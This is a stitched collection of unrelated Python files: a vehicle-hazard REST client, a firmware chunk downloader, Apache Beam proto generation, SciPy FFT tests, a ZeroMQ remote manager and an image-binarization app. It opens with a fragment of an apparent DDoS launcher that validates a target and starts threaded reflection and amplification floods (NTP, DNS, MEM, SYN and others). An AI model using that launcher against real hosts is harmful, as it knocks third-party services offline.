if 65535 < port or port < 1: exit("Invalid Port [Min: 1 / Max: 65535] ")
if not ProxyTools.Patterns.IP.match(target): exit("Invalid Ip Selected")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD", "SYN"} and \
not ToolsConsole.checkRawSocket(): exit("Cannot Create Raw Socket ")
if method in {"NTP", "DNS", "RDP", "CHAR", "MEM", "ARD"}:
if len(argv) == 6:
refl_li = Path(currentDir / "files" / argv[5].strip())
if not refl_li.exists(): exit("The Reflector file doesn't exist ")
ref = set(a.strip() for a in ProxyTools.Patterns.IP.findall(refl_li.open("r+").read()))
if not ref: exit("Empty Reflector File ")
for _ in range(threads):
Thread(target=Layer4, args=((target, port), ref, method, event,), daemon=True).start()
print("Attack Started !")
event.set()
while timer:
timer -= 1
sleep(1)
event.clear()
exit()
ToolsConsole.usage()
|
RestClientWindow.py
|
#RestClientThreads.py
import requests
import json
import time
import threading
#TYPE: ORIGINAL FILE
#MODIFICATION: This file NEEDS TO BE MODIFIED
#-According to the layer, a different NUMBER_POA_SCENARIO is required
#DATE: 15-04-2020
#TO-DOs:
# -Testing not updated
"""
DESCRIPTION:
#Implements the window approach, were a car publishes to the current server, the prevous one and the next one
#This script attempts to creates 3 independent thread3 used to publish to each given URL.
#in single approach we just publish to one server at a given time
"""
NUMBER_POA_SCENARIO=8 #MODIFICATION-this must be the same number of active servers in the scenario
detected_hazards_urls=['http://192.168.122.104:30131/detected_hazard','http://192.168.122.104:30131/detected_hazard','http://192.168.122.104:30131/detected_hazard'] #URL of the server when using AdvantEDGE
url_vehicles='http://192.168.122.104:30131/vehiclelist'
#define the headers to be sent in the post request
headers={'accept':'application/json','content-type':'application/json'}
#generates the message to be posted -->returns: payload
#Parameters:
#h_identifier=a unique identifier o the hazard
#h_name= a given information of the hazard (not used now)
#h_type=a 2 char string to say the type of hazard (an-->animal, ph-->pothole, pd-->pedestrian...)
#h_location= the location of where the car started to "detect" the hazard
def set_payload(h_identifier,h_name, h_type, h_location):
payload='''{
"id": "''' + str(h_identifier)+ '''",
"sn": "'''+ str(h_name) + '''",
"ht": "''' + str(h_type)+ '''",
"l": "'''+ str(h_location)[0:10]+ '''"
}'''
return payload
#posts a generic essage on the server -->returns: payload
#Parameters:
#url: server url where to post
#payload: the string to post
def post_server (url,payload):
response=requests.post(url,data=(payload),headers=headers)
print (response)
#registers the vehicle in the server
#Parameters:
#V_id: the identifier of the vehicle (v001-v002...)
#port_v: the port the vehicle uses for the communication
def post_vehicle_registration (V_id, port_v):
payload='''{
"id": "''' + str(V_id)+ '''",
"port": "'''+ str(port_v) + '''"
}'''
response=requests.post(url_vehicles,data=(payload),headers=headers)
#print (response)
#gets the list of vehicles registered in the server
#returns--> string containing the vehicles iniformation
def get_vehicle_list():
r = requests.get(url_vehicles)
#r.text returns the data given by the server (corresponding to the information asked)
return r.text
#The method creates and independent thread for each server where we want to post
#Parameters:
#h_identifier=a unique identifier o the hazard
#h_name= a given information of the hazard (not used now)
#h_type=a 2 char string to say the type of hazard (an-->animal, ph-->pothole, pd-->pedestrian...)
#h_location= the location of where the car started to "detect" the hazard
def post_hazard (h_identifier,h_name, h_type, h_location,PoA):
payload=set_payload(h_identifier,h_name, h_type, h_location)
if PoA==1:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+31)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+51)+'/detected_hazard'
elif PoA==NUMBER_POA_SCENARIO:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+29)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+49)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
else:
"""detected_hazards_urls[0]='http://192.168.122.104:301'+str(PoA+30)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:301'+str(PoA+29)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:301'+str(PoA+31)+'/detected_hazard' """
detected_hazards_urls[0]='http://192.168.122.104:151'+str(PoA+50)+'/detected_hazard'
detected_hazards_urls[1]='http://192.168.122.104:151'+str(PoA+49)+'/detected_hazard'
detected_hazards_urls[2]='http://192.168.122.104:151'+str(PoA+51)+'/detected_hazard'
#print(detected_hazards_urls)
for url in detected_hazards_urls:
x0_vehicle_movement = threading.Thread(target=poster, args=(payload,url))
x0_vehicle_movement.daemon = True
x0_vehicle_movement.start()
#post a hazard in the server.
#Parameters:
#payload: the formated data to be posted
#url: the server url
def poster (payload,url):
#print("starting thread:", url)
posting_time=time.time()
response=requests.post(url,data=(payload),headers=headers)
end_posting_time=time.time()
print ("time: ",url,end_posting_time-posting_time)
#gets the list of registered hazardsin the server
#returns--> string containing the hzd iniformation
def get_hazards_list():
r = requests.get(detected_hazards_url)
#r.text returns the data given by the server (corresponding to the information asked)
return r.text
#deletes a given hazard in the server DB
#returns --> 204 on success
def delete_hazard(identifier):
url=detected_hazards_url+"/"+str(identifier)
r = requests.delete(url)
#r.text returns the data given by the server (corresponding to the information asked)
return r
#TODO: TESTING NOT UPDATED
if __name__ == "__main__":
post_vehicle_registration("v001",5005)
print (get_vehicle_list())
while True:
start_time = time.time()
print ("posting test hazard 1-test")
resp= post_hazard ("h100","Testing_hazard1", "Test1", 1234)
end_time = time.time()
print ("Post time: ", end_time - start_time)
time.sleep(2)
|
donlonder.py
|
from threading import Thread, Lock
import requests
import shutil
import time
import os
DATA_PATH = "data"
ipsw_url = "http://updates-http.cdn-apple.com/2019FallFCS/fullrestores/061-08416/B909A8DE-C875-11E9-BEC0-C95359F8FB35/iPhone11,8_13.0_17A577_Restore.ipsw"
info = requests.head(ipsw_url).headers
content_length = int(info.get('Content-Length'))
class Loader():
def __init__(self):
self.perc = 0
self.lock = Lock()
def print(self):
# print("\r" + ("#" * 10))
print("\r{} > {}% ".format("#" * self.perc, self.perc), end='')
def add(self):
self.lock.acquire()
try:
self.perc += 1
self.print()
except:
pass
self.lock.release()
loader = Loader()
def calculate_ranges(size, chunks_count = 1):
chunk_size = int(size / chunks_count)
chunks = []
chunked = 0
for index in range(chunks_count - 1):
chunked = chunk_size * (index + 1)
chunks.append([
chunk_size * index,
chunked - 1,
])
chunks.append([
chunked,
size,
])
return chunks
def download_chunk_range(url, index, chunk_range):
def download():
try:
content_range = "{}-{}".format(*chunk_range)
response = requests.get(url, headers={"Range": "bytes={}".format(content_range)})
filename = "data/file.ipsw{}".format(index)
open(filename, "wb").write(response.content)
except:
print("Downloading error: %s" % index)
return False
return True
while not download():
pass
loader.add()
def mkdir(path):
if not os.path.exists(path):
os.mkdir(path)
# print(content_length)
# print(calculate_ranges(content_length, 100))
# exit()
mkdir(DATA_PATH)
# data_len = 4093153955
data_len = 100000000
data_len = content_length
content_ranges = calculate_ranges(data_len, 100)
for index, content_range in enumerate(content_ranges):
Thread(target=download_chunk_range, args=(ipsw_url, index, content_range)).start()
loader.print()
|
gen_protos.py
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Generates Python proto modules and grpc stubs for Beam protos."""
from __future__ import absolute_import
from __future__ import print_function
import glob
import logging
import multiprocessing
import os
import platform
import shutil
import subprocess
import sys
import time
import warnings
import pkg_resources
# TODO(BEAM-5414): latest grpcio-tools incompatible with latest protobuf 3.6.1.
GRPC_TOOLS = 'grpcio-tools>=1.3.5,<=1.14.2'
BEAM_PROTO_PATHS = [
os.path.join('..', '..', 'model', 'pipeline', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'job-management', 'src', 'main', 'proto'),
os.path.join('..', '..', 'model', 'fn-execution', 'src', 'main', 'proto'),
]
PYTHON_OUTPUT_PATH = os.path.join('apache_beam', 'portability', 'api')
MODEL_RESOURCES = [
os.path.normpath('../../model/fn-execution/src/main/resources'\
+ '/org/apache/beam/model/fnexecution/v1/standard_coders.yaml'),
]
def generate_proto_files(force=False):
try:
import grpc_tools # pylint: disable=unused-variable
except ImportError:
warnings.warn('Installing grpcio-tools is recommended for development.')
py_sdk_root = os.path.dirname(os.path.abspath(__file__))
common = os.path.join(py_sdk_root, '..', 'common')
proto_dirs = [os.path.join(py_sdk_root, path) for path in BEAM_PROTO_PATHS]
proto_files = sum(
[glob.glob(os.path.join(d, '*.proto')) for d in proto_dirs], [])
out_dir = os.path.join(py_sdk_root, PYTHON_OUTPUT_PATH)
out_files = [path for path in glob.glob(os.path.join(out_dir, '*_pb2.py'))]
if out_files and not proto_files and not force:
# We have out_files but no protos; assume they're up to date.
# This is actually the common case (e.g. installation from an sdist).
logging.info('No proto files; using existing generated files.')
return
elif not out_files and not proto_files:
if not os.path.exists(common):
raise RuntimeError(
'Not in apache git tree; unable to find proto definitions.')
else:
raise RuntimeError(
'No proto files found in %s.' % proto_dirs)
# Regenerate iff the proto files or this file are newer.
elif force or not out_files or len(out_files) < len(proto_files) or (
min(os.path.getmtime(path) for path in out_files)
<= max(os.path.getmtime(path)
for path in proto_files + [os.path.realpath(__file__)])):
try:
from grpc_tools import protoc
except ImportError:
if platform.system() == 'Windows':
# For Windows, grpcio-tools has to be installed manually.
raise RuntimeError(
'Cannot generate protos for Windows since grpcio-tools package is '
'not installed. Please install this package manually '
'using \'pip install grpcio-tools\'.')
# Use a subprocess to avoid messing with this process' path and imports.
# Note that this requires a separate module from setup.py for Windows:
# https://docs.python.org/2/library/multiprocessing.html#windows
p = multiprocessing.Process(
target=_install_grpcio_tools_and_generate_proto_files)
p.start()
p.join()
if p.exitcode:
raise ValueError("Proto generation failed (see log for details).")
else:
logging.info('Regenerating out-of-date Python proto definitions.')
builtin_protos = pkg_resources.resource_filename('grpc_tools', '_proto')
args = (
[sys.executable] + # expecting to be called from command line
['--proto_path=%s' % builtin_protos] +
['--proto_path=%s' % d for d in proto_dirs] +
['--python_out=%s' % out_dir] +
# TODO(robertwb): Remove the prefix once it's the default.
['--grpc_python_out=grpc_2_0:%s' % out_dir] +
proto_files)
ret_code = protoc.main(args)
if ret_code:
raise RuntimeError(
'Protoc returned non-zero status (see logs for details): '
'%s' % ret_code)
# copy resource files
for path in MODEL_RESOURCES:
shutil.copy2(os.path.join(py_sdk_root, path), out_dir)
ret_code = subprocess.call(["pip", "install", "future==0.16.0"])
if ret_code:
raise RuntimeError(
'Error installing future during proto generation')
ret_code = subprocess.call(
["futurize", "--both-stages", "--write", "--verbose", "--no-diff",
out_dir])
if ret_code:
raise RuntimeError(
'Error applying futurize to generated protobuf python files.')
# Though wheels are available for grpcio-tools, setup_requires uses
# easy_install which doesn't understand them. This means that it is
# compiled from scratch (which is expensive as it compiles the full
# protoc compiler). Instead, we attempt to install a wheel in a temporary
# directory and add it to the path as needed.
# See https://github.com/pypa/setuptools/issues/377
def _install_grpcio_tools_and_generate_proto_files():
install_path = os.path.join(
os.path.dirname(os.path.abspath(__file__)), '.eggs', 'grpcio-wheels')
build_path = install_path + '-build'
if os.path.exists(build_path):
shutil.rmtree(build_path)
logging.warning('Installing grpcio-tools into %s', install_path)
try:
start = time.time()
subprocess.check_call(
[sys.executable, '-m', 'pip', 'install',
'--target', install_path, '--build', build_path,
'--upgrade', GRPC_TOOLS])
logging.warning(
'Installing grpcio-tools took %0.2f seconds.', time.time() - start)
finally:
sys.stderr.flush()
shutil.rmtree(build_path, ignore_errors=True)
sys.path.append(install_path)
try:
generate_proto_files()
finally:
sys.stderr.flush()
if __name__ == '__main__':
generate_proto_files(force=True)
|
multiprocess_test.py
|
import multiprocessing
num_procs = 4
def do_work(message):
print ("work",message ,"completed")
def worker():
for item in iter( q.get, None ):
do_work(item)
q.task_done()
q.task_done()
q = multiprocessing.JoinableQueue()
procs = []
for i in range(num_procs):
procs.append( multiprocessing.Process(target=worker) )
procs[-1].daemon = True
procs[-1].start()
source = ['hi','there','how','are','you','doing']
for item in source:
q.put(item)
q.join()
for p in procs:
q.put( None )
q.join()
for p in procs:
p.join()
print ("Finished everything....")
print ("num active children:", multiprocessing.active_children())
|
remote_manager.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from six.moves import queue
import threading
import zmq
from parl.utils import logger, to_byte, to_str
from parl.remote import remote_constants
from parl.remote.remote_object import RemoteObject
"""
Two steps to build the communication with remote clients:
1. Create a RemoteManager;
2. Get remote objects by calling the function get_remote.
```python
remote_manager = RemoteManager(port=[port])
remote_obj = remote_manager.get_remote()
```
"""
class RemoteManager(object):
"""
Base class for network communcation.
"""
def __init__(self, port):
"""
Args:
port(int): a local port used for connections from remote clients.
"""
self.zmq_context = zmq.Context()
socket = self.zmq_context.socket(zmq.REP)
socket.bind("tcp://*:{}".format(port))
self.socket = socket
self.socket.linger = 0
self.remote_pool = queue.Queue()
t = threading.Thread(target=self._wait_for_connection)
t.setDaemon(True) # The thread will exit when main thread exited
t.start()
def _wait_for_connection(self):
"""
A never-ending function keeps waiting for the connections from remote client.
It will put an available remote object in an internel pool, and remote object
can be obtained by calling `get_remote`.
Note that this function has been called inside the `__init__` function.
"""
while True:
try:
message = self.socket.recv_multipart()
tag = message[0]
if tag == remote_constants.CONNECT_TAG:
self.socket.send_multipart([
remote_constants.NORMAL_TAG, b'Connect server success.'
])
client_info = to_str(message[1])
remote_client_address, remote_client_id = client_info.split(
)
remote_obj = RemoteObject(remote_client_address,
remote_client_id,
self.zmq_context)
logger.info('[RemoteManager] Added a new remote object.')
self.remote_pool.put(remote_obj)
elif tag == remote_constants.HEARTBEAT_TAG:
self.socket.send_multipart(
[remote_constants.NORMAL_TAG, b'Server is alive.'])
else:
raise NotImplementedError()
except zmq.ZMQError:
logger.warning('Zmq error, exiting server.')
break
def get_remote(self):
"""
A blocking function to obtain a remote object.
Returns:
RemoteObject
"""
return self.remote_pool.get()
def close(self):
"""
Close RemoteManager.
"""
self.zmq_context.destroy()
|
test_numpy.py
|
import queue
import threading
import multiprocessing
import numpy as np
import pytest
from numpy.random import random
from numpy.testing import (
assert_array_almost_equal, assert_array_equal, assert_allclose
)
from pytest import raises as assert_raises
import scipy.fft as fft
def fft1(x):
L = len(x)
phase = -2j*np.pi*(np.arange(L)/float(L))
phase = np.arange(L).reshape(-1, 1) * phase
return np.sum(x*np.exp(phase), axis=1)
class TestFFTShift(object):
def test_fft_n(self):
assert_raises(ValueError, fft.fft, [1, 2, 3], 0)
class TestFFT1D(object):
def test_identity(self):
maxlen = 512
x = random(maxlen) + 1j*random(maxlen)
xr = random(maxlen)
for i in range(1,maxlen):
assert_array_almost_equal(fft.ifft(fft.fft(x[0:i])), x[0:i],
decimal=12)
assert_array_almost_equal(fft.irfft(fft.rfft(xr[0:i]),i),
xr[0:i], decimal=12)
def test_fft(self):
x = random(30) + 1j*random(30)
expect = fft1(x)
assert_array_almost_equal(expect, fft.fft(x))
assert_array_almost_equal(expect, fft.fft(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30),
fft.fft(x, norm="ortho"))
assert_array_almost_equal(expect / 30, fft.fft(x, norm="forward"))
def test_ifft(self):
x = random(30) + 1j*random(30)
assert_array_almost_equal(x, fft.ifft(fft.fft(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.ifft(fft.fft(x, norm=norm), norm=norm))
def test_fft2(self):
x = random((30, 20)) + 1j*random((30, 20))
expect = fft.fft(fft.fft(x, axis=1), axis=0)
assert_array_almost_equal(expect, fft.fft2(x))
assert_array_almost_equal(expect, fft.fft2(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20),
fft.fft2(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20),
fft.fft2(x, norm="forward"))
def test_ifft2(self):
x = random((30, 20)) + 1j*random((30, 20))
expect = fft.ifft(fft.ifft(x, axis=1), axis=0)
assert_array_almost_equal(expect, fft.ifft2(x))
assert_array_almost_equal(expect, fft.ifft2(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20),
fft.ifft2(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20),
fft.ifft2(x, norm="forward"))
def test_fftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
expect = fft.fft(fft.fft(fft.fft(x, axis=2), axis=1), axis=0)
assert_array_almost_equal(expect, fft.fftn(x))
assert_array_almost_equal(expect, fft.fftn(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20 * 10),
fft.fftn(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20 * 10),
fft.fftn(x, norm="forward"))
def test_ifftn(self):
x = random((30, 20, 10)) + 1j*random((30, 20, 10))
expect = fft.ifft(fft.ifft(fft.ifft(x, axis=2), axis=1), axis=0)
assert_array_almost_equal(expect, fft.ifftn(x))
assert_array_almost_equal(expect, fft.ifftn(x, norm="backward"))
assert_array_almost_equal(fft.ifftn(x) * np.sqrt(30 * 20 * 10),
fft.ifftn(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20 * 10),
fft.ifftn(x, norm="forward"))
def test_rfft(self):
x = random(29)
for n in [x.size, 2*x.size]:
for norm in [None, "backward", "ortho", "forward"]:
assert_array_almost_equal(
fft.fft(x, n=n, norm=norm)[:(n//2 + 1)],
fft.rfft(x, n=n, norm=norm))
assert_array_almost_equal(fft.rfft(x, n=n) / np.sqrt(n),
fft.rfft(x, n=n, norm="ortho"))
def test_irfft(self):
x = random(30)
assert_array_almost_equal(x, fft.irfft(fft.rfft(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfft(fft.rfft(x, norm=norm), norm=norm))
def test_rfft2(self):
x = random((30, 20))
expect = fft.fft2(x)[:, :11]
assert_array_almost_equal(expect, fft.rfft2(x))
assert_array_almost_equal(expect, fft.rfft2(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20),
fft.rfft2(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20),
fft.rfft2(x, norm="forward"))
def test_irfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, fft.irfft2(fft.rfft2(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfft2(fft.rfft2(x, norm=norm), norm=norm))
def test_rfftn(self):
x = random((30, 20, 10))
expect = fft.fftn(x)[:, :, :6]
assert_array_almost_equal(expect, fft.rfftn(x))
assert_array_almost_equal(expect, fft.rfftn(x, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30 * 20 * 10),
fft.rfftn(x, norm="ortho"))
assert_array_almost_equal(expect / (30 * 20 * 10),
fft.rfftn(x, norm="forward"))
def test_irfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, fft.irfftn(fft.rfftn(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.irfftn(fft.rfftn(x, norm=norm), norm=norm))
def test_hfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
expect = fft.fft(x)
assert_array_almost_equal(expect, fft.hfft(x_herm))
assert_array_almost_equal(expect, fft.hfft(x_herm, norm="backward"))
assert_array_almost_equal(expect / np.sqrt(30),
fft.hfft(x_herm, norm="ortho"))
assert_array_almost_equal(expect / 30,
fft.hfft(x_herm, norm="forward"))
def test_ihfft(self):
x = random(14) + 1j*random(14)
x_herm = np.concatenate((random(1), x, random(1)))
x = np.concatenate((x_herm, x[::-1].conj()))
assert_array_almost_equal(x_herm, fft.ihfft(fft.hfft(x_herm)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x_herm, fft.ihfft(fft.hfft(x_herm, norm=norm), norm=norm))
def test_hfft2(self):
x = random((30, 20))
assert_array_almost_equal(x, fft.hfft2(fft.ihfft2(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.hfft2(fft.ihfft2(x, norm=norm), norm=norm))
def test_ihfft2(self):
x = random((30, 20))
expect = fft.ifft2(x)[:, :11]
assert_array_almost_equal(expect, fft.ihfft2(x))
assert_array_almost_equal(expect, fft.ihfft2(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20),
fft.ihfft2(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20),
fft.ihfft2(x, norm="forward"))
def test_hfftn(self):
x = random((30, 20, 10))
assert_array_almost_equal(x, fft.hfftn(fft.ihfftn(x)))
for norm in ["backward", "ortho", "forward"]:
assert_array_almost_equal(
x, fft.hfftn(fft.ihfftn(x, norm=norm), norm=norm))
def test_ihfftn(self):
x = random((30, 20, 10))
expect = fft.ifftn(x)[:, :, :6]
assert_array_almost_equal(expect, fft.ihfftn(x))
assert_array_almost_equal(expect, fft.ihfftn(x, norm="backward"))
assert_array_almost_equal(expect * np.sqrt(30 * 20 * 10),
fft.ihfftn(x, norm="ortho"))
assert_array_almost_equal(expect * (30 * 20 * 10),
fft.ihfftn(x, norm="forward"))
@pytest.mark.parametrize("op", [fft.fftn, fft.ifftn,
fft.rfftn, fft.irfftn,
fft.hfftn, fft.ihfftn])
def test_axes(self, op):
x = random((30, 20, 10))
axes = [(0, 1, 2), (0, 2, 1), (1, 0, 2), (1, 2, 0), (2, 0, 1), (2, 1, 0)]
for a in axes:
op_tr = op(np.transpose(x, a))
tr_op = np.transpose(op(x, axes=a), a)
assert_array_almost_equal(op_tr, tr_op)
@pytest.mark.parametrize("op", [fft.fft2, fft.ifft2,
fft.rfft2, fft.irfft2,
fft.hfft2, fft.ihfft2,
fft.fftn, fft.ifftn,
fft.rfftn, fft.irfftn,
fft.hfftn, fft.ihfftn])
def test_axes_subset_with_shape(self, op):
x = random((16, 8, 4))
axes = [(0, 1, 2), (0, 2, 1), (1, 2, 0)]
for a in axes:
# different shape on the first two axes
shape = tuple([2*x.shape[ax] if ax in a[:2] else x.shape[ax]
for ax in range(x.ndim)])
# transform only the first two axes
op_tr = op(np.transpose(x, a), s=shape[:2], axes=(0, 1))
tr_op = np.transpose(op(x, s=shape[:2], axes=a[:2]), a)
assert_array_almost_equal(op_tr, tr_op)
def test_all_1d_norm_preserving(self):
# verify that round-trip transforms are norm-preserving
x = random(30)
x_norm = np.linalg.norm(x)
n = x.size * 2
func_pairs = [(fft.fft, fft.ifft),
(fft.rfft, fft.irfft),
# hfft: order so the first function takes x.size samples
# (necessary for comparison to x_norm above)
(fft.ihfft, fft.hfft),
]
for forw, back in func_pairs:
for n in [x.size, 2*x.size]:
for norm in ['backward', 'ortho', 'forward']:
tmp = forw(x, n=n, norm=norm)
tmp = back(tmp, n=n, norm=norm)
assert_array_almost_equal(x_norm,
np.linalg.norm(tmp))
@pytest.mark.parametrize("dtype", [np.half, np.single, np.double,
np.longdouble])
def test_dtypes(self, dtype):
# make sure that all input precisions are accepted
x = random(30).astype(dtype)
assert_array_almost_equal(fft.ifft(fft.fft(x)), x)
assert_array_almost_equal(fft.irfft(fft.rfft(x)), x)
assert_array_almost_equal(fft.hfft(fft.ihfft(x), len(x)), x)
@pytest.mark.parametrize(
"dtype",
[np.float32, np.float64, np.longfloat,
np.complex64, np.complex128, np.longcomplex])
@pytest.mark.parametrize("order", ["F", 'non-contiguous'])
@pytest.mark.parametrize(
"fft",
[fft.fft, fft.fft2, fft.fftn,
fft.ifft, fft.ifft2, fft.ifftn])
def test_fft_with_order(dtype, order, fft):
# Check that FFT/IFFT produces identical results for C, Fortran and
# non contiguous arrays
rng = np.random.RandomState(42)
X = rng.rand(8, 7, 13).astype(dtype, copy=False)
if order == 'F':
Y = np.asfortranarray(X)
else:
# Make a non contiguous array
Y = X[::-1]
X = np.ascontiguousarray(X[::-1])
if fft.__name__.endswith('fft'):
for axis in range(3):
X_res = fft(X, axis=axis)
Y_res = fft(Y, axis=axis)
assert_array_almost_equal(X_res, Y_res)
elif fft.__name__.endswith(('fft2', 'fftn')):
axes = [(0, 1), (1, 2), (0, 2)]
if fft.__name__.endswith('fftn'):
axes.extend([(0,), (1,), (2,), None])
for ax in axes:
X_res = fft(X, axes=ax)
Y_res = fft(Y, axes=ax)
assert_array_almost_equal(X_res, Y_res)
else:
raise ValueError
class TestFFTThreadSafe(object):
threads = 16
input_shape = (800, 200)
def _test_mtsame(self, func, *args):
def worker(args, q):
q.put(func(*args))
q = queue.Queue()
expected = func(*args)
# Spin off a bunch of threads to call the same function simultaneously
t = [threading.Thread(target=worker, args=(args, q))
for i in range(self.threads)]
[x.start() for x in t]
[x.join() for x in t]
# Make sure all threads returned the correct value
for i in range(self.threads):
assert_array_equal(q.get(timeout=5), expected,
'Function returned wrong value in multithreaded context')
def test_fft(self):
a = np.ones(self.input_shape, dtype=np.complex128)
self._test_mtsame(fft.fft, a)
def test_ifft(self):
a = np.full(self.input_shape, 1+0j)
self._test_mtsame(fft.ifft, a)
def test_rfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(fft.rfft, a)
def test_irfft(self):
a = np.full(self.input_shape, 1+0j)
self._test_mtsame(fft.irfft, a)
def test_hfft(self):
a = np.ones(self.input_shape, np.complex64)
self._test_mtsame(fft.hfft, a)
def test_ihfft(self):
a = np.ones(self.input_shape)
self._test_mtsame(fft.ihfft, a)
@pytest.mark.parametrize("func", [fft.fft, fft.ifft, fft.rfft, fft.irfft])
def test_multiprocess(func):
# Test that fft still works after fork (gh-10422)
with multiprocessing.Pool(2) as p:
res = p.map(func, [np.ones(100) for _ in range(4)])
expect = func(np.ones(100))
for x in res:
assert_allclose(x, expect)
class TestIRFFTN(object):
def test_not_last_axis_success(self):
ar, ai = np.random.random((2, 16, 8, 32))
a = ar + 1j*ai
axes = (-2,)
# Should not raise error
fft.irfftn(a, axes=axes)
|
main.py
|
import sys # sys нужен для передачи argv в QApplication
import os
import time
import threading
from multiprocessing import Queue, Pool, Manager, Lock, current_process
import psutil
import shutil
import cv2
from PyQt5 import QtWidgets, QtGui, QtCore
import design # Это наш конвертированный файл дизайна
import images_shower
tasks_queue = Queue()
unblocking_queue = Queue()
FINISH_TASK = "Finish"
BLOCKING_TASK = "Block"
PROCESSES_COUNT = 10
START_PROCESSES_COUNT = 4
WAITING_TEXT = "waiting"
READY_TEXT = "ready"
TMP_DIRECTORY = "tmp"
SHOWING_IMAGE_WIDTH = 526
SHOWING_IMAGE_HEIGHT = 669
RIGHT_EFFICIENCY = 0.8
LEFT_EFFICIENCY = 0.4
results_queue = Queue()
atomic_operation = Lock()
def binarize_image(image):
"""
Принимает картинку в виде numpy-массива BGR
"""
image = cv2.cvtColor(image, cv2.COLOR_RGB2GRAY)
_, image = cv2.threshold(image, 0, 255, cv2.THRESH_BINARY + cv2.THRESH_OTSU)
return image
def save_tmp_image(image, file_path):
if not os.path.exists(TMP_DIRECTORY):
os.mkdir(TMP_DIRECTORY)
_, file_name = os.path.split(file_path)
result_path = os.path.join(TMP_DIRECTORY, file_name)
cv2.imwrite(result_path, image)
def worker_fun(tasks_queue, results_queue, unblocking_queue, namespace, atomic_operation):
unblocking_task = unblocking_queue.get()
namespace.currently_working_processes += 1
while True:
task = tasks_queue.get()
if task == FINISH_TASK:
results_queue.put(task)
break
if task == BLOCKING_TASK:
atomic_operation.acquire()
if namespace.currently_working_processes != 1: # Никогда не блокируем первый поток
namespace.currently_working_processes -= 1
atomic_operation.release()
unblocking_task = unblocking_queue.get()
namespace.currently_working_processes += 1
else:
atomic_operation.release()
tasks_queue.put(BLOCKING_TASK)
continue
file_name = task.split(' ')[1]
# Проверка того, есть ли доступная память
# Если доступная память есть - загрузка и обработка картинки
file_size = os.path.getsize(file_name)
namespace.currently_taking_memory += file_size
available_memory = psutil.virtual_memory().available # объёмы доступной памяти в байтах
if namespace.currently_taking_memory >= (available_memory - 1024):
# Запускать задачу не можем, кладём её обратно в очередь
tasks_queue.put(task)
namespace.currently_taking_memory -= file_size
continue
# Время работы начинаем замерять отсюда
start_all_time, start_process_time = time.time(), time.process_time()
image = cv2.imread(file_name)
namespace.currently_taking_memory -= file_size
image = binarize_image(image)
# Результат - в папку tmp по имени - имя файла
save_tmp_image(image, file_name)
# Время работы заканчиваем замерять здесь
end_all_time, end_process_time = time.time(), time.process_time()
efficiency = (end_process_time - start_process_time) / (end_all_time - start_all_time)
if efficiency > RIGHT_EFFICIENCY:
unblocking_queue.put("1")
if efficiency < LEFT_EFFICIENCY and (end_process_time - start_process_time) != 0.0:
